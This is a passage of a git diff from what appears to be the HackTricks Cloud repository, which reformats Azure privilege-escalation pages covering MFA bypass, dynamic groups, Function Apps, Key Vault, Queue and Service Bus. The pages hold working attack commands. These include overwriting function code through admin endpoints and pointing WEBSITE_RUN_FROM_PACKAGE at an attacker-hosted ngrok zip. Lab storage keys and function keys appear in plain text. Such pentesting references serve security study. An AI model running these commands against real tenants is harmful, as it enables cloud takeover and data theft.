**compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail. ### Compliant Devices 
@@ -116,9 +100,9 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken Find more information about this kind of attack in the following page: -{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md) -{% endcontent-ref %} +{{#ref}} +../../az-lateral-movement-cloud-on-prem/pass-the-prt.md +{{#endref}} ## Tooling @@ -149,9 +133,8 @@ Invoke-MFASweep -Username -Password This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded. -{% hint style="success" %} -You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force. -{% endhint %} +> [!TIP] +> You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force. ```bash ./ropci configure @@ -179,12 +162,10 @@ Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested: -{% code overflow="wrap" %} ```powershell $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune Read-JWTtoken -token $token.access_token ``` -{% endcode %} Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token: 
@@ -194,20 +175,7 @@ $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl ## References -* [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s) -* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) +- [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM&t=296s) +- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md new file mode 100644 index 000000000..22061b615 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md 
@@ -0,0 +1,50 @@ +# Az - Dynamic Groups Privesc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. + +Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. + +This feature requires Azure AD premium P1 license. + +## Privesc + +Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. 
+ +Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** + +### Example + +- **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` +- **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group + +For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ +Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: + +```powershell +# Login with the gust user +az login --allow-no-subscriptions + +# Get user object ID +az ad signed-in-user show + +# Update otherMails +az rest --method PATCH \ + --url "https://graph.microsoft.com/v1.0/users/" \ + --headers 'Content-Type=application/json' \ + --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}' + +# Verify the update +az rest --method GET \ + --url "https://graph.microsoft.com/v1.0/users/" \ + --query "otherMails" +``` + +## References + +- [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md similarity index 79% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index c2b691c2c..32fee7bad 100644 
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md @@ -1,27 +1,14 @@ # Az - Functions App Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Function Apps Check the following page for more information: -{% content-ref url="../az-services/az-function-apps.md" %} -[az-function-apps.md](../az-services/az-function-apps.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-function-apps.md +{{#endref}} ### Bucket Read/Write @@ -29,7 +16,7 @@ With permissions to read the containers inside the Storage Account that stores t Once you find where the code of the function is located if you have write permissions over it you can make the function execute any code and escalate privileges to the managed identities attached to the function. -* **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)` +- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)` The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function. 
@@ -43,17 +30,15 @@ az functionapp config appsettings list \ Those configs will contain the **Storage Account Key** that the Function can use to access the code. -{% hint style="danger" %} -With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges. -{% endhint %} +> [!CAUTION] +> With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges. The following example uses macOS to connect to the file share, but it's recommended to check also the following page for more info about file shares: -{% content-ref url="../az-services/az-file-shares.md" %} -[az-file-shares.md](../az-services/az-file-shares.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-file-shares.md +{{#endref}} -{% code overflow="wrap" %} ```bash # Username is the name of the storage account # Password is the Storage Account Key @@ -63,9 +48,8 @@ The following example uses macOS to connect to the file share, but it's recommen open "smb://.file.core.windows.net/" ``` -{% endcode %} -* **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`) +- **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`) It's also common to find the **zip releases** inside the folder `function-releases` of the Storage Account container that the function app is using in a container **usually called `function-releases`**. 
@@ -79,15 +63,14 @@ az functionapp config appsettings list \ This config will usually contain a **SAS URL to download** the code from the Storage Account. -{% hint style="danger" %} -With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges. -{% endhint %} +> [!CAUTION] +> With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges. -* **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` +- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` Just like in the previous case, if the deployment is done via Github Actions it's possible to find the folder **`github-actions-deploy`** in the Storage Account containing a zip of the code and a SAS URL to the zip in the setting `WEBSITE_RUN_FROM_PACKAGE`. -* **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`) +- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`) With permissions to read the containers inside the Storage Account that stores the function data it's possible to find the container **`scm-releases`**. In there it's possible to find the latest release in **Squashfs filesystem file format** and therefore it's possible to read the code of the function: 
@@ -125,9 +108,8 @@ unsquashfs -d /tmp/fs /tmp/scm-latest-.zip It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside. -{% hint style="danger" %} -With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges. -{% endhint %} +> [!CAUTION] +> With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges. ```bash # Modify code inside the script in /tmp/fs adding your code @@ -148,30 +130,25 @@ az storage blob upload \ This permission allows to list the function, master and system keys, but not the host one, of the specified function with: -{% code overflow="wrap" %} ```bash az functionapp keys list --resource-group --name ``` -{% endcode %} With the master key it's also possible to to get the source code in a URL like: -{% code overflow="wrap" %} ```bash # Get "script_href" from az rest --method GET \ --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01" -# Access +# Access curl "?code=" ## Python example: curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v ``` -{% endcode %} And to **change the code that is being executed** in the function with: -{% code overflow="wrap" %} ```bash # Set the code to set in the function in /tmp/function_app.py ## The following continues using the python example 
@@ -181,70 +158,56 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro -H "If-Match: *" \ -v ``` -{% endcode %} ### Microsoft.Web/sites/functions/listKeys/action This permission allows to get the host key, of the specified function with: -{% code overflow="wrap" %} ```bash az rest --method POST --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//listKeys?api-version=2022-03-01" ``` -{% endcode %} ### Microsoft.Web/sites/host/functionKeys/write This permission allows to create/update a function key of the specified function with: -{% code overflow="wrap" %} ```bash az functionapp keys set --resource-group --key-name --key-type functionKeys --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` -{% endcode %} ### Microsoft.Web/sites/host/masterKey/write This permission allows to create/update a master key to the specified function with: -{% code overflow="wrap" %} ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` -{% endcode %} -{% hint style="danger" %} -Remember that with this key you can also access the source code and modify it as explained before! -{% endhint %} +> [!CAUTION] +> Remember that with this key you can also access the source code and modify it as explained before! ### Microsoft.Web/sites/host/systemKeys/write This permission allows to create/update a system function key to the specified function with: -{% code overflow="wrap" %} ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` -{% endcode %} ### Microsoft.Web/sites/config/list/action This permission allows to get the settings of a function. 
Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**. -{% code overflow="wrap" %} ```bash az functionapp config appsettings list --name --resource-group ``` -{% endcode %} Moreover, this permission also allows to get the **SCM username and password** (if enabled) with: -{% code overflow="wrap" %} ```bash az rest --method POST \ --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/publishingcredentials/list?api-version=2018-11-01" ``` -{% endcode %} ### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write @@ -252,7 +215,7 @@ These permissions allows to list the config values of a function as we have seen It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application: -* Start by getting the current config +- Start by getting the current config ```bash az functionapp config appsettings list \ @@ -260,10 +223,10 @@ az functionapp config appsettings list \ --resource-group ``` -* Create the code you want the function to run and host it publicly +- Create the code you want the function to run and host it publicly ```bash -# Write inside /tmp/web/function_app.py the code of the function +# Write inside /tmp/web/function_app.py the code of the function cd /tmp/web/function_app.py zip function_app.zip function_app.py python3 -m http.server 
@@ -272,11 +235,10 @@ python3 -m http.server ngrok http 8000 ``` -* Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code. +- Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code. The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , this is where I was hosting the app. -{% code overflow="wrap" %} ```bash # Modify the function az rest --method PUT \ 
@@ -284,13 +246,11 @@ az rest --method PUT \ --headers '{"Content-Type": "application/json"}' \ --body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}' ``` -{% endcode %} ### Microsoft.Web/sites/hostruntime/vfs/write With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint): -{% code overflow="wrap" %} ```bash # This is a python example, so we will be overwritting function_app.py # Store in /tmp/body the raw python code to put in the function @@ -299,7 +259,6 @@ az rest --method PUT \ --headers '{"Content-Type": "application/json", "If-Match": "*"}' \ --body @/tmp/body ``` -{% endcode %} ### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write) 
@@ -321,11 +280,10 @@ az functionapp deployment user set \ --password 'P@ssw0rd123!' ``` -* If **REDACTED** credentials +- If **REDACTED** credentials If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` -{% code overflow="wrap" %} ```bash # Enable basic authentication for SCM az rest --method PUT \ @@ -345,9 +303,8 @@ az rest --method PUT \ } } ``` -{% endcode %} -* **Method SCM** +- **Method SCM** Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables: @@ -368,7 +325,7 @@ You can also access the web page from `https://.scm.azurewebsites.net/ The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account. -* **Method FTP** +- **Method FTP** Connect to the FTP server using: @@ -392,30 +349,25 @@ _Note that the **FTP username** is usually in the format \\\$\/resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` -{% endcode %} ### Microsoft.Web/sites/functions/token/action With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code: -{% code overflow="wrap" %} ```bash # Get admin token az rest --method POST \ @@ -427,7 +379,6 @@ az rest --method POST \ curl "https://.azurewebsites.net/admin/host/systemkeys/_master" \ -H "Authorization: Bearer " ``` -{% endcode %} ### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read) 
@@ -443,11 +394,9 @@ az functionapp config appsettings set \ It's also possible to see if a function is enabled or disabled in the following URL (using the permission in parenthesis): -{% code overflow="wrap" %} ```bash az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//properties/state?api-version=2024-04-01" ``` -{% endcode %} ### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read) @@ -463,14 +412,12 @@ az functionapp config container set --name \ With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity. -{% code overflow="wrap" %} ```bash az functionapp identity assign \ --name \ --resource-group \ --identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ ``` -{% endcode %} ### Remote Debugging @@ -484,11 +431,9 @@ az functionapp show --name --resource-group Having the permission `Microsoft.Web/sites/config/write` it's also possible to put a function in debugging mode (the following command also requires the permissions `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` and `Microsoft.Web/sites/Read`). -{% code overflow="wrap" %} ```bash az functionapp config set --remote-debugging-enabled=True --name --resource-group ``` -{% endcode %} ### Change Github repo @@ -509,17 +454,4 @@ az functionapp deployment source config \ --branch main --github-action true ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md new file mode 100644 index 000000000..700f6e3eb --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md @@ -0,0 +1,34 @@ +# Az - Key Vault Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Key Vault + +For more information about this service check: + +{{#ref}} +../az-services/keyvault.md +{{#endref}} + +### Microsoft.KeyVault/vaults/write + +An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). + +```bash +# If access policies in the output, then you can abuse it +az keyvault show --name + +# Get current principal ID +az ad signed-in-user show --query id --output tsv + +# Assign all permissions +az keyvault set-policy \ + --name \ + --object-id \ + --key-permissions all \ + --secret-permissions all \ + --certificate-permissions all \ + --storage-permissions all +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md similarity index 54% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md index 0d92f6fca..af2250673 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md 
@@ -1,37 +1,22 @@ # Az - Queue Storage Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Queue For more information check: -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-queue-enum.md +{{#endref}} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. -{% code overflow="wrap" %} ```bash az storage message peek --queue-name --account-name ``` -{% endcode %} **Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. 
@@ -39,27 +24,22 @@ az storage message peek --queue-name --account-name --account-name ``` -{% endcode %} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. -{% code overflow="wrap" %} ```bash az storage message put --queue-name --content "Injected malicious message" --account-name ``` -{% endcode %} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. -{% code overflow="wrap" %} ```bash az storage message put --queue-name --content "Injected malicious message" --account-name @@ -71,13 +51,11 @@ az storage message update --queue-name \ --visibility-timeout \ --account-name ``` -{% endcode %} ### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write` This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. -{% code overflow="wrap" %} ```bash az storage queue create --name --account-name 
@@ -85,25 +63,11 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -{% endcode %} ## References -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes +- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md similarity index 72% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md index ce5248f01..1aff5fbc9 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md @@ -1,34 +1,19 @@ # Az - Service Bus Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Service Bus For more information check: -{% content-ref url="../az-services/az-servicebus-enum.md" %} -[az-servicebus-enum.md](../az-services/az-servicebus-enum.md) -{% endcontent-ref %} - +{{#ref}} +../az-services/az-servicebus-enum.md +{{#endref}} ### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow. -{% code overflow="wrap" %} ```python #You need to install the following libraries #pip install azure-servicebus @@ -97,12 +82,11 @@ print("Messages Sent") print("----------------------------") ``` -{% endcode %} ### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` + You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows. -{% code overflow="wrap" %} ```python #You need to install the following libraries #pip install azure-servicebus 
@@ -125,15 +109,15 @@ async def receive_and_process_messages(): # Get the Subscription Receiver object for the specified topic and subscription receiver = servicebus_client.get_subscription_receiver( - topic_name=TOPIC_NAME, - subscription_name=SUBSCRIPTION_NAME, + topic_name=TOPIC_NAME, + subscription_name=SUBSCRIPTION_NAME, max_wait_time=5 ) async with receiver: # Receive messages with a defined maximum wait time and count received_msgs = await receiver.receive_messages( - max_wait_time=5, + max_wait_time=5, max_message_count=20 ) for msg in received_msgs: @@ -148,6 +132,7 @@ print("----------------------------") ``` ### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write` + If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC). ```bash 
@@ -160,18 +145,10 @@ az servicebus namespace authorization-rule update \
 ## References
-* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
-* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
-* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
-* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
-* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
